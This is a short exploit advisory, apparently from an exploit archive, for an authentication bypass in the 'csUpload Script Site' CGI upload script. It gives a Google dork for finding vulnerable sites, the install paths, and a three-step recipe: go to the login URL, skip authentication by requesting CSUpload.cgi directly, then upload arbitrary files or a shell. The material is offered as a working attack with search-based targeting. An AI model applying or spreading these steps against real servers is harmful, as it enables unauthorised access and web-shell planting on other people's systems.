20 lines
No EOL
715 B
Text
20 lines
No EOL
715 B
Text
# Exploit Title: ["csUpload Script Site" Authentication Bypass]
|
|
# Google Dork: [CSUpload.cgi?command=]
|
|
# Date: 4/9/2014
|
|
# Exploit Author: Satanic2000
|
|
# Vendor Homepage: http://www.cgiscript.net
|
|
# Software Link: http://www.cgiscript.net/cgi-script/csNews/csNews.cgi?database=cgi.db&command=viewone&id=12
|
|
# Version:
|
|
# Tested on: linux
|
|
# www.Site.com/[path]/CSUpload/CSUpload.cgi
|
|
# [path] : /cgi-script/ or /cgi-bin/ or None
|
|
|
|
# Example:
|
|
|
|
# 1- http://localhost/cgi-bin/CSUpload//CSUpload.cgi?command=login
|
|
|
|
# 2- Bypass Authentication http://localhost/cgi-bin/CSUpload/CSUpload.cgi
|
|
|
|
# 3- Select Database Select Databases And Upload (File,Or Shell)
|
|
|
|
# Special tnx S3Ri0uS . Pejvak . l3l4ck.$c0rpi0n And Other Friend |